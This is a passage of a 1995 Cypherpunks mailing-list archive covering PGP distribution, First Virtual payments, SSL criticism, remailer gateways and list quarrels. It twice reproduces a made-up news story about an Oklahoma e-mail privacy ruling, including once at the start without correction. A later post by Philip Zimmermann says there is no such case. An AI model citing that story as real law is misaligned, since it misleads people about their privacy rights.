13:53:02 -0400 Subject: The little sex kitten JUDGE RULES ON E-MAIL PRIVACY CASE TULSA, OKLA -- The Oklahoma Supreme Court has ruled on a case that many legal experts believe clearly delineates the e-mail privacy rights of computer users in the workplace. Judge Stan Musing declared that employees have a right to expect that their empolyers will refrain from monitoring e-mail messages transmitted on company systems. The case went to court after programmer Augustus Lindsey's supervisor monitored his e-mail and intercepted a message from Lindsey to a colleague. The message read: "That little sex kitten has been driving me wild. She's moaning and begging for it every minute. Last night I was afraid someone would hear, and we'd be thrown out of the building. But don't worry -- all is arranged. Wednesday she gets the knife". Lindsey's supervisor alerted authorities, suspecting that a crime was in the making. Lindsey was arrested on the spot and spent an uncomfortable night discussing the situation with the police. However, he was released in the morning, just in time to get his female cat to the vet for spaying. Lindsey sued his boss for invasion of privacy and sought punitive damages as well. ---- From jis at mit.edu Sat Jul 29 12:09:05 1995 From: jis at mit.edu (Jeffrey I. Schiller) Date: Sat, 29 Jul 95 12:09:05 PDT Subject: MIT PGP distribution site accessible from Canada Message-ID: -----BEGIN PGP SIGNED MESSAGE----- MIT PGP distribution site accessible from Canada July 29, 1995 MIT is pleased to announce that, after consulting with the US State Office of Defense Trade Controls, we have clarified procedures that permit us to make our PGP distribution site accessible from Canada. We would like to thank ODTC for helping us to make this possible. People in Canada attempting to download PGP from MIT will be required to assert that they are Canadian citizens and that they are obtaining the software for end-use in Canada by Canadian citizens, or for return to the United States. You can obtain PGP via the World Wide Web at http://web.mit.edu/network/pgp.html You can also obtain PGP via anonymous FTP to net-dist.mit.edu. Connect to the directory pub/PGP and get and read the README file. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBqHC8UtR20Nv5BtAQHYKwP9EOZ+E9ZtX6oRmrstl+JzHUUgMPMZp5by zOVuBJtPCNPeQekv+A5lJWzaJVxdJePHvvRttbLv3VYH6i5I/TGwoe0zLyiBsl5B piSkC6ERLRR1052DC6ki8xj7C1SR5LKlhRY8k9fFn7UwkPw6JDNRAPY4Qh+T3vzX IUZG0XomYMA= =Yaww -----END PGP SIGNATURE----- From adam at bwh.harvard.edu Sat Jul 29 12:39:05 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Sat, 29 Jul 95 12:39:05 PDT Subject: Zimmerman legal fund In-Reply-To: <19336.9507291110@exe.dcs.exeter.ac.uk> Message-ID: <199507291938.PAA08633@bwh.harvard.edu> Adam B wrote: | Okay, now separate issue, really talking about FV now. For me, the | main thing holding me back from using it is that I'm not in the US, | and don't have a US bank account to open a FV seller acct. (I would | have liked to use it as one of the few net payment systems actually up | and running, as a payment method for the RSA T-shirts, it would have | been a nice system, allowing me to effectively accept VISA payments | which I have otherwise been unable to do.) Incidentally, the FV terms of service prohibit the sale of material goods using FV as a payment system. Its intended for selling information, not physical products. This is reflected in the fact that the seller takes multiple risks of non-payment. You could probably get away with selling individualized, signed tokens redeemable for a t-shirt after 30 days to mitigate your risk, abide by FV's TOS, and make the buyers happy, but this seems like a lot of work to use FV. Adam S -- "It is seldom that liberty of any kind is lost all at once." -Hume From dmandl at panix.com Sat Jul 29 13:02:58 1995 From: dmandl at panix.com (David Mandl) Date: Sat, 29 Jul 95 13:02:58 PDT Subject: The little sex kitten Message-ID: At 11:57 AM 7/29/95, Philip Zimmermann wrote: >JUDGE RULES ON E-MAIL PRIVACY CASE > >TULSA, OKLA -- The Oklahoma Supreme Court has ruled on a case that many >legal experts believe clearly delineates the e-mail privacy rights of >computer users in the workplace. Judge Stan Musing declared that employees >have a right to expect that their empolyers will refrain from monitoring >e-mail messages transmitted on company systems. Far as I can tell, this is meaningless. If you sign a paper "consenting" to email monitoring by your employer, they've got a green light, period. And under those circumstances, I'd think very few companies would be foolish enough not to just ask you to sign. So the only ones who have to worry are those who don't get your "permission" first, and probably more and more companies will just be more up front about it in the future. The tightwad, privacy-loathing scumbags I work for sprang just such a document on us recently, and after squirming and bitching about it for a while, I actually did sign, simply because I wasn't prepared to lose my job at that point. My fear, based on well-established tradition, is that eventually this will become widespread and more and more employers will monitor email, with coerced "consent." --Dave. -- Dave Mandl dmandl at panix.com http://wfmu.org/~davem From prz at acm.org Sat Jul 29 13:15:31 1995 From: prz at acm.org (Philip Zimmermann) Date: Sat, 29 Jul 95 13:15:31 PDT Subject: The little sex kitten -- untrue story Message-ID: <199507292010.UAA10501@maalox> I posted this funny story to cypherpunks earlier today after someone emailed it to me. Now I am told the the story is false. There are no court records of such a case. And it apparantly was posted to the net (maybe to cypherpunks) months ago, and it was shown to be false. I should have checked it out before posting it to a public newsgroup. Sorry about that. How embarrassing. Well, it still has entertainment value, as long as it's clearly labeled as fiction. -Philip Zimmermann Date: Thu, 27 Jul 1995 13:53:02 -0400 Subject: The little sex kitten JUDGE RULES ON E-MAIL PRIVACY CASE TULSA, OKLA -- The Oklahoma Supreme Court has ruled on a case that many legal experts believe clearly delineates the e-mail privacy rights of computer users in the workplace. Judge Stan Musing declared that employees have a right to expect that their empolyers will refrain from monitoring e-mail messages transmitted on company systems. The case went to court after programmer Augustus Lindsey's supervisor monitored his e-mail and intercepted a message from Lindsey to a colleague. The message read: "That little sex kitten has been driving me wild. She's moaning and begging for it every minute. Last night I was afraid someone would hear, and we'd be thrown out of the building. But don't worry -- all is arranged. Wednesday she gets the knife". Lindsey's supervisor alerted authorities, suspecting that a crime was in the making. Lindsey was arrested on the spot and spent an uncomfortable night discussing the situation with the police. However, he was released in the morning, just in time to get his female cat to the vet for spaying. Lindsey sued his boss for invasion of privacy and sought punitive damages as well. ---- From carolann at censored.org Sat Jul 29 14:18:26 1995 From: carolann at censored.org (UnCensored Girls Anonymous) Date: Sat, 29 Jul 95 14:18:26 PDT Subject: Financial Latency Was: Zimmerman legal fund Message-ID: <199507292118.OAA25623@mailhost.primenet.com> -----BEGIN PGP SIGNED MESSAGE----- It isn't only clearing latency that's a problem. FV has already taken over 5 days to deal with a simple account problem. Latency might be a Good Thing(tm) in remailers, but it's a Bad Thing(tm) in financial services. It's a "repuation market" kinda thing. First Virtual is starting to fall down on many counts. I'd have paid more if I could have found a place that would have cleared things faster. And....inasmuch as these are "real-time" computers we're dealing with here on the net, bad transacions and fraud can be stopped cold. Or with only minor losses, at the very most. Love Always, Carol Anne > Incidentally, the FV terms of service prohibit the sale of >material goods using FV as a payment system. Its intended for selling >information, not physical products. This is reflected in the fact >that the seller takes multiple risks of non-payment. > > You could probably get away with selling individualized, >signed tokens redeemable for a t-shirt after 30 days to mitigate your >risk, abide by FV's TOS, and make the buyers happy, but this seems >like a lot of work to use FV. > >Adam S > > >-- >"It is seldom that liberty of any kind is lost all at once." > -Hume -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBqlVIrpjEWs1wBlAQEWkwP/Yxu0048VA85SN7kpGbmVfAAikeGaaEgH 6vJ1CwUpfSdQC99MamNDooXW7YWISK+M42WWPrcUaCLQDa9U4ww45Rgx7SheONcm k/YbGOuc7rpHxrUJ4TB11y4qC6qA4fh0Ogeju1Xl4Rp7RifGgQ6pON9KfqpZhFl/ qEsj/oBlo50= =8ZAD -----END PGP SIGNATURE----- -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From chen at intuit.com Sat Jul 29 14:47:15 1995 From: chen at intuit.com (Mark Chen) Date: Sat, 29 Jul 95 14:47:15 PDT Subject: Netscape the Big Win In-Reply-To: <9507200747.AA15208@snark.imsi.com> Message-ID: <9507292145.AA29335@doom.intuit.com> > Crypto *is* integrated into Netscape. Unfortunately, the crypto is SSL > -- a complete waste of time. > > Among other things, SSL only lets you authenticate to X.509 > certificate roots that have been issued straight from the hands of Jim > Bidzos -- which effectively means that you can secure only connections > with Netscape commerce servers, and that you cannot authenticate both > ends of the communications link. Its also just plain bad -- there are > ugly holes in the security from what I can see. Netscape is, of > course, pushing it as a standard. Vomit. > > Luckily, Netscape recently hired Tahir El Gammal (did I put too many > m's there?) and he's a smart guy. Unfortunately, he seems to be in a > position where he has to defend the fairly bad work they did already. Still in catch-up mode. . . . As the person who evaluated Courier for Intuit, I feel compelled to point out that Intuit does *not* endorse SSL. I agree with all of Perry's criticisms, and offer a couple of my own: 1) since SSL is a sub-application-level protocol trying to solve an application-level security problem, it leaves communicating nodes vulnerable to early-termination attacks. SSL MACs authenticate individual SSL records, not application messages. 2) since only fools run http servers on secure network segments, network admins are faced with the problem of clearing sensitive data (presumably "protected" on the line by SSL) out of the DMZ in real time. This is a pain. Fortunately, Courier suffers from neither of these infirmities. - Mark - -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From rsalz at osf.org Sat Jul 29 15:46:28 1995 From: rsalz at osf.org (Rich Salz) Date: Sat, 29 Jul 95 15:46:28 PDT Subject: Set phone permit "wire" taps Message-ID: <9507292245.AA09763@sulphur.osf.org> >I've been arrested too amy times, an done enough local, state, and >federal time to know. Prove it. Please post one date and location of incarceration as well as an identifying number. /r$ From vznuri at netcom.com Sat Jul 29 15:53:23 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Sat, 29 Jul 95 15:53:23 PDT Subject: Phillip Elmer Dewitt: "I screwed up" Message-ID: <199507292251.PAA01251@netcom17.netcom.com> there's an interesting debate going on over in alt.internet.media-coverage. Phillip Elmer Dewitt has been posting a bit on his role in the "Rimm job". Up until about now he has been very evasive, in denial, and seemingly deflecting criticism and playing "spin doctor" with his article. however, IMHO a breakthrough just happened where below he apologizes, although not for anything specific. some on the newsgroup are pressuring him to (1) run a new time story (2) issue some kind of retraction or advice to other journalists based on what he learned from the affair. I would suggest emailing him and trying to be conciliatory (don't flame his eyebrows off), but at the same time asking him to write something substantial about his experience that can either be circulated on the internet or in some other magazine. his experience in the affair, given in simple bullet-list form, would be immensely valuable to other reporters and could help "head off at the pass" (press?) many future internet-trashing articles. this is a very invaluable opportunity for cpunks to not merely whine and rant, but to try to influence the future in a positive way through your input. also in the newsgroup is an article in which he describes how 1) he had several indications the article made "suspicious" claims from people, including Mike Godwin of EFF, who he talked to on the phone about twice or so. he also noticed that it made unsupportable claims, even the one on the cover that tried to generalize the BBS info to the Internet realm. 2) he was suspicious of Rimm at a point, particularly after Rimm refused to elaborate on his background, and called his advisor and Rimm personally, and Rimm assured him that "nothing in his background would embarrass him or Time." apparently DeWitt also had heard about the "casino study". ------- Forwarded Message From: ped at panix.com (Philip Elmer-DeWitt) Newsgroups: alt.internet.media-coverage,alt.culture.internet,alt.culture.usenet Subject: Re: More PEDagogy (was Re: TIME Cover on Cyberporn) Date: Thu, 27 Jul 1995 19:04:56 -0500 > Yes, the damage is done. Even an honest retraction at this > point won't alter the public perception that the net is awash in > pornography. But I could honestly tell my students PED deserves > respect rather than scorn IF HE'D SWALLOW HIS PRIDE and urge his > colleagues to learn from his mistakes. > He probably won't. I'm not sure I could take my own advice > were the roles reversed. But PED, if you can't do what you should, > at least spare us any more embarrassing rationalizations. Good advice. I don't know how else to say it, so I'll just repeat what I've said before. I screwed up. The cover story was my idea, I pushed for it, and it ran pretty much the way I wrote it. It was my mistake, and my mistake alone. I do hope other reporters will learn from it. I know I have. I've also tried to explain how it happened, not to rationalize my mistakes, but to answer specific questions. I didn't want to seem unresponsive, and I generally don't mind a little embarassment. But I think you are right; answering those questions in this forum is only creating more bad will. If people are genuinely curious about how the Cyberporn debacle came to be, I will reply to queries in e-mail. - -- Philip Elmer-DeWitt ped at well.com TIME Magazine http://www.pathfinder.com From jamesd at echeque.com Sat Jul 29 16:25:12 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 29 Jul 95 16:25:12 PDT Subject: CDT report on Senate and House hearings on Online Pornography Message-ID: <199507292324.QAA24490@blob.best.net> Crypto relevance: Absolutely none. At 03:52 PM 7/28/95 -0700, Christopher E. Stefan wrote: > Somewhat interesting it seems, an ultra-conservative House is the First > Amendment's bigest friend on the [...] If ultra conservatives are folk who only increase school lunch funding by 4.5% (reducing the planned increase by 0.8%), who reduce the marriage penalty by $500, reduce government controlled broadcasting by 8%, and so forth, What then would you call people who would reduce the marriage penalty by $4000, abolish school lunch funding, and end government controlled broadcasting. Lunatic fringe ultra Nazis? --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From perry at panix.com Sat Jul 29 16:51:19 1995 From: perry at panix.com (Perry E. Metzger) Date: Sat, 29 Jul 95 16:51:19 PDT Subject: Financial Latency Was: Zimmerman legal fund In-Reply-To: <199507292118.OAA25623@mailhost.primenet.com> Message-ID: <199507292351.TAA12568@panix4.panix.com> UnCensored Girls Anonymous writes: > It isn't only clearing latency that's a problem. FV has already > taken over 5 days to deal with a simple account problem. Thank you, but this is *not* the First Virtual Bitchline. This is Cypherpunks. Please take this elsewhere. Perry From carolann at censored.org Sat Jul 29 17:22:01 1995 From: carolann at censored.org (UnCensored Girls Anonymous) Date: Sat, 29 Jul 95 17:22:01 PDT Subject: Set phone permit "wire" taps Message-ID: <199507300021.RAA26436@mailhost.primenet.com> 21445-175 >>I've been arrested too amy times, an done enough local, state, and >>federal time to know. > >Prove it. Please post one date and location of incarceration as well >as an identifying number. > /r$ > > -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From carolann at censored.org Sat Jul 29 17:25:20 1995 From: carolann at censored.org (UnCensored Girls Anonymous) Date: Sat, 29 Jul 95 17:25:20 PDT Subject: Set phone permit "wire" taps Message-ID: <199507300025.RAA26885@mailhost.primenet.com> Federal Now SHOW ME something. You sure question a lotta credentials, like you've REALLY been somewhere or done something. Love Always, Carol Anme >>I've been arrested too amy times, an done enough local, state, and >>federal time to know. > >Prove it. Please post one date and location of incarceration as well >as an identifying number. > /r$ > > -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From carolann at censored.org Sat Jul 29 17:38:05 1995 From: carolann at censored.org (UnCensored Girls Anonymous) Date: Sat, 29 Jul 95 17:38:05 PDT Subject: Financial Latency Was: Zimmerman legal fund Message-ID: <199507300037.RAA28696@mailhost.primenet.com> As long as ya wanna deal with 'who' rather than what, anything I post is irrelevant. And the reality of realtime cash conversion isn't pretty. And it makes no difference if it's Netcash, FV, CheckExpress or whomever it is. FV just happened to be there. It's kind of an illustrated example, for if I was really bitching, I'd cancel my account with them, tack it on my .sig, and post it all over usenet. For if you could sell shirts easily, you would. you aren't. Latency problems in cash conversion is still why. Love Always, Carol Anne ps methinks it's that heatwave that's got you. > >UnCensored Girls Anonymous writes: >> It isn't only clearing latency that's a problem. FV has already >> taken over 5 days to deal with a simple account problem. > >Thank you, but this is *not* the First Virtual Bitchline. This is >Cypherpunks. Please take this elsewhere. > >Perry > > -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From perry at panix.com Sat Jul 29 17:54:19 1995 From: perry at panix.com (Perry E. Metzger) Date: Sat, 29 Jul 95 17:54:19 PDT Subject: Financial Latency Was: Zimmerman legal fund In-Reply-To: <199507300037.RAA28696@mailhost.primenet.com> Message-ID: <199507300054.UAA18561@panix4.panix.com> Let me be perfectly clear. I have no idea who or what you are. You post constant streams of unparseable garbage (presumably produced by your very own wetware rather than a random string generator but its hard to tell) to this mailing list. So long as the stuff bears some passing resemblance to discussion of cryptography, well, its not up to me to criticize you just for being incomprehensable. However, it appears that you have some sort of weird problem with First Virtual that you don't have the common sense to resolve in private. Please deal with it privately. Its possible that I'm wrong and that you are discussing cryptography, but as your english prose is completely indecipherable to this cryptographer there is no way whatsoever to know, which makes it as good as irrelevant. Perry PS If your postings are in fact some sort of weird stegonographic cover for some meaningful message, which is one possible (unlikely) explanation for them, I would suggest posting them to alt.test instead. UnCensored Girls Anonymous writes: > As long as ya wanna deal with 'who' rather than what, > anything I post is irrelevant. > And the reality of realtime cash conversion isn't pretty. > > And it makes no difference if it's Netcash, FV, CheckExpress > or whomever it is. FV just happened to be there. It's kind of > an illustrated example, for if I was really bitching, I'd cancel > my account with them, tack it on my .sig, and post it all over usenet. > > For if you could sell shirts easily, you would. you aren't. > Latency problems in cash conversion is still why. > > Love Always, > > Carol Anne > ps methinks it's that heatwave that's got you. > > > >UnCensored Girls Anonymous writes: > >> It isn't only clearing latency that's a problem. FV has already > >> taken over 5 days to deal with a simple account problem. > > > >Thank you, but this is *not* the First Virtual Bitchline. This is > >Cypherpunks. Please take this elsewhere. > > > >Perry > > > > > -- > > Member Internet Society - Certified BETSI Programmer - Webmistress > *********************************************************************** > Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 > My Homepage > The Cyberdoc > *********************************************************************** > ------------------ PGP.ZIP Part [017/713] ------------------- > M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M > MF=O0H+*%(-S%&>S%+FS& MPGD ------------------------------------------------------------- > for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ > From futplex at pseudonym.com Sat Jul 29 18:33:03 1995 From: futplex at pseudonym.com (Futplex) Date: Sat, 29 Jul 95 18:33:03 PDT Subject: Mail2news Gates In-Reply-To: <9507300108.AA00621@mtjava.llnl.gov> Message-ID: <199507300131.VAA24713@thor.cs.umass.edu> John Erland writes: > Can someone send me a list of functioning mail-2-news gates? You asked this before (on June 4) and I answered (on June 21), but I take it you weren't reading the list then. Briefly, Matt Ghio's list is the only publicly announced list I've found -- the pertinent Usenet FAQs point solely to his list. mailto:mg5n+remailers at andrew.cmu.edu for the current list. I don't know how much Matt's been updating it, but I have yet to find an alternative. My previous reply may be found at http://www.hks.net/cpunks/cpunks-15/1567.html [...] > Also, is there a method by which one can access (via netmail) a list of the > newsgroups served by a given mail-2-news gate? I'm not aware of any standard protocol for this. Try sending mail to system@, root@, etc. -Futplex ObFlame1: Anon, if only nsb at fv *did* write copiously here ! ObFlame2: Brad D., at least make Orlin send this crap to the list himself From erc at khijol.intele.net Sat Jul 29 18:48:51 1995 From: erc at khijol.intele.net (Ed Carp [khijol SysAdmin]) Date: Sat, 29 Jul 95 18:48:51 PDT Subject: The little sex kitten In-Reply-To: Message-ID: On Sat, 29 Jul 1995, David Mandl wrote: > The tightwad, privacy-loathing scumbags I work for sprang just such a > document on us recently, and after squirming and bitching about it for a > while, I actually did sign, simply because I wasn't prepared to lose my job > at that point. My fear, based on well-established tradition, is that > eventually this will become widespread and more and more employers will > monitor email, with coerced "consent." That's OK - just use PGP :) -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From erc at khijol.intele.net Sat Jul 29 18:53:41 1995 From: erc at khijol.intele.net (Ed Carp [khijol SysAdmin]) Date: Sat, 29 Jul 95 18:53:41 PDT Subject: Set phone permit "wire" taps In-Reply-To: <199507300025.RAA26885@mailhost.primenet.com> Message-ID: On Sat, 29 Jul 1995, UnCensored Girls Anonymous wrote: > Federal > Now SHOW ME something. > You sure question a lotta credentials, > like you've REALLY been somewhere or done something. Oh, he has. He could tell you, but then he'd have to kill you ;) -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From liberty at gate.net Sat Jul 29 19:04:12 1995 From: liberty at gate.net (Jim Ray) Date: Sat, 29 Jul 95 19:04:12 PDT Subject: Financial Latency noise Message-ID: <199507300201.WAA08367@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- There is no way for both of you to get in the last word, so allow me. You're both right. Now please, make it stop! JMR - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMBrnCW1lp8bpvW01AQESGgP/Vtfym5YJh7lNUd2wWRNvFnS+mmHwWE6X DyVMPZ089YBqkxJUiXd74TyIVuoO90FiCMi6GbcRS9QziZRcVtl71hNdQb/IB62G 31kHa6n6rCzyrfdxN7NnZ/3MJh0bY+kK2hh2YK0tPjcT9o9ab/8OIp8XyukvdFbx N4QYIxIBgXw= =gwXi - -----END PGP SIGNATURE----- Regards, Jim Ray "This year or next, for the first time since the end of World War II, we will spend more for interest payments on the debt than on defense. Quite a stunning thing." -- President Bill Clinton "I'm sure as hell stunned!" -- citizen Jim Ray - ------------------------------------------------------------------------ PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 - ------------------------------------------------------------------------ Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! email: zldf at clark.net or visit http://www.netresponse.com/zldf ________________________________________________________________________ - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMBrnySoZzwIn1bdtAQFXLAGAqpniQwKB+kSjyyzJYmppOE2nKv69k3QK ZdENdZKGTq2wxEiqAyAMCb4qStYeXUCP =v2Yv -----END PGP SIGNATURE----- From kdf at gigo.com Sat Jul 29 19:16:04 1995 From: kdf at gigo.com (John Erland) Date: Sat, 29 Jul 95 19:16:04 PDT Subject: Mail2news Gates Message-ID: <4f6_9507291907@gigo.com> futplex at pseudonym.com wrote in a message to John Erland: fp> John Erland writes: > Can someone send me a list of functioning mail-2-news gates? fp> You asked this before (on June 4) and I answered (on June fp> 21), but I take it you weren't reading the list then. I specifically mentioned that I had but intermittant access to the list, but I believe I got the answer netmail. Unfortunately, it is already outdated, which is why I am asking again. fp> Briefly, Matt Ghio's list is the only publicly announced fp> list I've found -- the pertinent Usenet FAQs point solely to fp> his list. mailto:mg5n+remailers at andrew.cmu.edu for the fp> current list. Coolio. Just the thing! fp> I don't know how much Matt's been updating it, but I have fp> yet to find an alternative. I hope he does it fairly frequently, as these gates seem to have a half-life of about fifteen minutes. @news.demon.co.uk was one of the old standbys that seemed to be stable, but it appears to have locked us all out now. Thanks for the address! --- timEd 1.01 -- : Fidonet: John Erland 1:203/8055.12 .. speaking for only myself. : Internet: kdf at gigo.com From monty.harder at famend.com Sat Jul 29 20:44:12 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Sat, 29 Jul 95 20:44:12 PDT Subject: CMOS Message-ID: <8AE251D.000300028A.uuout@famend.com> O > stored? How much space is in the "memory" of CMOS? Typically, on the order of 64 bytes. YMMV. * Forrest Gump of Borg: Assimilation is =not= like a box of chocolates.... --- * Monster at FAmend.Com * From ghio at cmu.edu Sat Jul 29 22:16:49 1995 From: ghio at cmu.edu (Matthew Ghio) Date: Sat, 29 Jul 95 22:16:49 PDT Subject: Mail2news Gates In-Reply-To: <4f6_9507291907@gigo.com> Message-ID: John Erland wrote: > I hope he does it fairly frequently, as these gates seem to have a > half-life of about fifteen minutes. @news.demon.co.uk was one of the > old standbys that seemed to be stable, but it appears to have locked > us all out now. I usually test them about once a month or so. Time to do an update I guess... From remailer at flame.alias.net Sat Jul 29 23:01:19 1995 From: remailer at flame.alias.net (Flame Remailer) Date: Sat, 29 Jul 95 23:01:19 PDT Subject: Encrypted Telnet Message-ID: <199507300601.IAA24503@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- Announcing CryptoTCP beta version 0.9 CTCP is a public domain software package to do encrypted TCP sessions on unix systems. It features Diffie-Hellman key exchange with triple-DES encryption. This initial release is to be considered a beta version. Bug reports or comments on security issues are invited. Features: - May be installed by any user on the system and does not require root privileges. - Server can protect all TCP-based services (mail, news, web, etc.) - Includes a secure telnet client. - A random key is chosen for each session, so sessions can not be decrypted later or replayed. - Source code is available and in the public domain. - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.71828 mQCNAjAalD0AAAEEAMBUTOJHpIlIkK+bHYlOvt36k6szaJE9QgygMmtTlWKpDRZA aKT4LaFKdB9trS5zUCBan55Gg+3Yj0MItwoS+8B+x9IpCizFsaymOhpt75a59kFY 935ozxxAs6GCziXb1BiCDz07OVE5X10QCa8lz9ZvDrt0X1iLk/32LDYerV6NAAUT tCBNYXVkZSBYIDxhbHQuYW5vbnltb3VzLm1lc3NhZ2VzPg== =WP49 - -----END PGP PUBLIC KEY BLOCK----- Detached signature for ctcp.0.9.tar: - -----BEGIN PGP MESSAGE----- Version: 2.71828 iQCVAgUAMBqiPf32LDYerV6NAQHUoAP/RLU0mM3ydxC9vjzay8hR5Qmb5zupHyCO klW8IYjxIt14jnBTqkVM7q+mnaAWK2Ishppe14H5K6MAn/VOe2o5Hf61wAzJuxzw wywiA9ZOdb+2cxm86YMgdbrnv430BCbSjPITV5PHyorovSqhX4RLLB1R8oOX4WUB 5WwzgLyV6Kc= =ltvK - -----END PGP MESSAGE----- -----BEGIN PGP SIGNATURE----- Version: 2.71828 iQCVAgUBMBqp7f32LDYerV6NAQHBhAP9FTq0XIlPOcd5EqtAEQISFQkZ2ISZCwQi u4Kfpfp8xv435dBVO22Awc1R8FxgsWab7x/98CTMkKtTCtz5P30xVECfrYJP4aDF aTEZTdBQZzx/NsozqmdhZSh7uuuS5h4IQCZWwG+dgexFZzgXYdw7+e/IIoJfo2pZ bk5/Y1u3HGI= =d5iJ -----END PGP SIGNATURE----- From erc at khijol.intele.net Sun Jul 30 00:13:50 1995 From: erc at khijol.intele.net (Ed Carp [khijol SysAdmin]) Date: Sun, 30 Jul 95 00:13:50 PDT Subject: Encrypted Telnet In-Reply-To: <199507300601.IAA24503@utopia.hacktic.nl> Message-ID: On Sun, 30 Jul 1995, Flame Remailer wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Announcing CryptoTCP beta version 0.9 > > CTCP is a public domain software package to do encrypted TCP sessions on > unix systems. It features Diffie-Hellman key exchange with triple-DES > encryption. This initial release is to be considered a beta version. > Bug reports or comments on security issues are invited. > > Features: > > - May be installed by any user on the system and does not require root > privileges. > > - Server can protect all TCP-based services (mail, news, web, etc.) > > - Includes a secure telnet client. > > - A random key is chosen for each session, so sessions can not be > decrypted later or replayed. > > - Source code is available and in the public domain. Oh, thanks a lot - tell us everything except where to get it... -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From jya at pipeline.com Sun Jul 30 07:14:34 1995 From: jya at pipeline.com (John Young) Date: Sun, 30 Jul 95 07:14:34 PDT Subject: SIN_not Message-ID: <199507301414.KAA07174@pipe1.nyc.pipeline.com> 7-30-95. NYPaper: "His Terrible Swift Sword: Thomas Sowell takes the shortest way with left-liberal elites." [Book Review] His stated mission is to attack and destroy the dominant intellectual elites of modern America: those liberal and left-wing intellectuals whose disproportionate control over the American psyche he believes responsible for the drift, stagnation and disquiet of our times. The anointed, as he dubs them with ill-concealed derision, have the right degrees and clubby credentials, but tbeir false sense of noblesse oblige and their inordinate faith in their own intelligence and probity blind them to the cautious, decentralized and incremental logic of markets. In consequence, they unwisely embrace huge government interventions to end a set of social "crises" that never existed. They have expanded civil liability beyond recognition. They have led the civil rights movement away from equal opportunity and individual merit into the bottomless pit of affirmative action and minority set-asides. They have wrecked the criminal justice system and have licensed judges to stray from judicial restraint into the lawless world of judicial activism. NIF_pig "N.R.A. Criticized for Aggressive Tactics: Against the A.T.F." The National Rifle Association has entered an aggressive new phase in its long and contentious relationship with the Bureau of Alcohol, Tobacco and Firearms. Opponents of the N.R.A., as well as some of its longtime supporters, say some of the organization's tactics have crossed ethical boundaries and may well have backfired, reinforcing an image of the group as dominated by right-wing zealots. NAW_leg Duet: SIN_not From usura at replay.com Sun Jul 30 07:35:32 1995 From: usura at replay.com (Alex de Joode) Date: Sun, 30 Jul 95 07:35:32 PDT Subject: You asked for it...4/5 Message-ID: <199507301435.AA26950@xs1.xs4all.nl> I did only receive picture number 4, the others never showed up. -- Alex de Joode Fear Uncertainty and Doubt, Inc. From usura at 